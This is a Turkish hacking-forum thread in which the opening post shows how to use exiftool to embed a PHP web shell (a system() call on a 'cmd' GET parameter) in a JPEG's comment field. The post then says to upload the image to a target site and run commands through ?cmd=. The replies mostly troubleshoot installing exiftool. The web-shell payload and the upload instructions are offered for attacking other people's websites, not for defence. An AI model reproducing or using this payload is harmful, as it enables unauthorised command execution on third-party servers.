İPUCU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

EXIFTOOL ile fotoğrafa shell gömme / Siber Güvenlik Kulübü

lovelypeople - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2015
Mesajlar:
29
Konular:
3
Teşekkür (Etti):
40
Teşekkür (Aldı):
6
Ticaret:
(0) %
24-06-2019 13:08
#1
EXIFTOOL ile fotoğrafa shell gömme / Siber Güvenlik Kulübü
Not:Eski yöntemdir fazla işe yaramaz ama hala yiyen siteler vardır.

EXIFTOOL indirmek için (Kali Linux)

Kod:
sudo apt-get install exiftool
Fotoğrafın olduğu klasöre girip

Kod:
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' fotoismi.jpg
Kodunu yazıyoruz ve hedef siteye upload ediyoruz.Upload ettikten sonra fotoğrafın linkine gidip sonuna ?cmd= ekleyin.
--------------------- Visita Interiorae Terrae Rectificando Invenies Occultum Lapidem
porsukhak Teşekkür etti.
PourLa - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2016
Nereden:
Mesajlar:
1.075
Konular:
262
Teşekkür (Etti):
67
Teşekkür (Aldı):
134
Ticaret:
(0) %
24-06-2019 13:47
#2
Vallah 10 numara konu yararlı Bilmiyenler için ama görselle süslesen çok güzel olurdu
---------------------
PourLa
Html/Css > Python > C ve C++
lovelypeople - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2015
Mesajlar:
29
Konular:
3
Teşekkür (Etti):
40
Teşekkür (Aldı):
6
Ticaret:
(0) %
24-06-2019 14:35
#3
Alıntı:
PourLa´isimli üyeden Alıntı Mesajı göster
Vallah 10 numara konu yararlı Bilmiyenler için ama görselle süslesen çok güzel olurdu
sağol dostum bir dahakine süsleriz (:
--------------------- Visita Interiorae Terrae Rectificando Invenies Occultum Lapidem
injector - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2018
Nereden:
style.css
Mesajlar:
831
Konular:
163
Teşekkür (Etti):
16
Teşekkür (Aldı):
117
Ticaret:
(0) %
25-06-2019 17:40
#4
@lovelypeople aşağıdaki hatayı alıyorum ?
Kod:
bash: exiftool: command not found
---------------------

║▌║█║▌│║▌║▌█║▌║║▌║█
IПJΣCTOЯ
║▌║█║▌│║▌║▌█║▌║║▌║█
leaks - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2018
Mesajlar:
658
Konular:
3
Ticaret:
(0) %
25-06-2019 18:10
#5
Alıntı:
injector´isimli üyeden Alıntı Mesajı göster
@lovelypeople aşağıdaki hatayı alıyorum ?
Kod:
bash: exiftool: command not found
Demek ki `exiftool' diye bir şey yüklü değilmiş.
Kod:
apt install exiftool
Yukarıdaki komutla şansınızı deneyebilirsiniz. Repository'de varsa yüklenir, yoksa kaynak kodundan derlemek lazım.
injector - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2018
Nereden:
style.css
Mesajlar:
831
Konular:
163
Teşekkür (Etti):
16
Teşekkür (Aldı):
117
Ticaret:
(0) %
25-06-2019 18:23
#6
Alıntı:
leaks´isimli üyeden Alıntı Mesajı göster
Demek ki `exiftool' diye bir şey yüklü değilmiş.
Kod:
apt install exiftool
Yukarıdaki komutla şansınızı deneyebilirsiniz. Repository'de varsa yüklenir, yoksa kaynak kodundan derlemek lazım.
@leaks
Kod:
Paket listeleri okunuyor... Bitti
Bağımlılık ağacı oluşturuluyor       
Durum bilgisi okunuyor... Bitti      
Not, 'exiftool' yerine 'libimage-exiftool-perl' seçiliyor
libimage-exiftool-perl zaten en yeni sürümde (11.16-1).
Aşağıdaki paketler otomatik olarak kurulmuş ve artık bu paketlere gerek duyulmuyor:
  acccheck cython3 iotop keepnote libstatgrab10 libstd-rust-1.32 lolcat mg
  python-mockito python-whoosh python3-iso8601 ruby-paint ruby-trollop saidar
  zile
Bu paketleri kaldırmak için 'sudo apt autoremove' komutunu kullanın.
0 paket yükseltilecek, 0 yeni paket kurulacak, 0 paket kaldırılacak ve 0 paket yükseltilmeyecek.
---------------------

║▌║█║▌│║▌║▌█║▌║║▌║█
IПJΣCTOЯ
║▌║█║▌│║▌║▌█║▌║║▌║█
leaks - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2018
Mesajlar:
658
Konular:
3
Ticaret:
(0) %
25-06-2019 18:40
#7
Alıntı:
injector´isimli üyeden Alıntı Mesajı göster
Kod:
cd
git clone https://github.com/exiftool/exiftool.git exiftool
echo "PATH=$PATH:$HOME/exiftool" >> .bashrc
. .bashrc
exiftool exiftool/t/images/ExifTool.jpg
Ekrana uzunca bir çıktı yazdırırsa işlem başarılı demektir.


@injector
Konu leaks tarafından (25-06-2019 18:44 Saat 18:44 ) değiştirilmiştir.
Liserjik - ait Kullanıcı Resmi (Avatar)
İhbar Hattı Görevlisi
Üyelik tarihi:
08/2018
Nereden:
268,3 g/mol
Yaş:
1
Mesajlar:
1.048
Konular:
112
Teşekkür (Etti):
105
Teşekkür (Aldı):
294
Ticaret:
(0) %
25-06-2019 18:41
#8
Alıntı:
injector´isimli üyeden Alıntı Mesajı göster
@leaks
Kod:
Paket listeleri okunuyor... Bitti
Bağımlılık ağacı oluşturuluyor       
Durum bilgisi okunuyor... Bitti      
Not, 'exiftool' yerine 'libimage-exiftool-perl' seçiliyor
libimage-exiftool-perl zaten en yeni sürümde (11.16-1).
Aşağıdaki paketler otomatik olarak kurulmuş ve artık bu paketlere gerek duyulmuyor:
  acccheck cython3 iotop keepnote libstatgrab10 libstd-rust-1.32 lolcat mg
  python-mockito python-whoosh python3-iso8601 ruby-paint ruby-trollop saidar
  zile
Bu paketleri kaldırmak için 'sudo apt autoremove' komutunu kullanın.
0 paket yükseltilecek, 0 yeni paket kurulacak, 0 paket kaldırılacak ve 0 paket yükseltilmeyecek.
Kod:
apt install git && apt install perl && git clone https://github.com/exiftool/exiftool.git
Kod:
perl exiftool/exiftool ornek.jpg
--------------------- 5 & 9 homie, rest in peace


* VITALLION *
injector - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2018
Nereden:
style.css
Mesajlar:
831
Konular:
163
Teşekkür (Etti):
16
Teşekkür (Aldı):
117
Ticaret:
(0) %
25-06-2019 18:44
#9
Alıntı:
Liserjik´isimli üyeden Alıntı Mesajı göster


Kod:
apt install git && apt install perl && git clone https://github.com/exiftool/exiftool.git
Kod:
perl exiftool/exiftool ornek.jpg
fotoğraf hakkında bilgi veriyor içine shell gömülmüyor ? @liserjiik
---------------------

║▌║█║▌│║▌║▌█║▌║║▌║█
IПJΣCTOЯ
║▌║█║▌│║▌║▌█║▌║║▌║█
Liserjik - ait Kullanıcı Resmi (Avatar)
İhbar Hattı Görevlisi
Üyelik tarihi:
08/2018
Nereden:
268,3 g/mol
Yaş:
1
Mesajlar:
1.048
Konular:
112
Teşekkür (Etti):
105
Teşekkür (Aldı):
294
Ticaret:
(0) %
25-06-2019 18:52
#10
Alıntı:
injector´isimli üyeden Alıntı Mesajı göster
fotoğraf hakkında bilgi veriyor içine shell gömülmüyor ? @liserjiik
Örnek olarak kurulum ve çalışıp çalışmadığını anlamanız için yazmıştım ve yolunu veridiğiniz grafik dosyasının exif bilgilerini gördüğünüze göre başarılı.

Shell kısmı konuya ait.
Kod:
https://www.turkhackteam.org/8818454-post1.html
--------------------- 5 & 9 homie, rest in peace


* VITALLION *

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı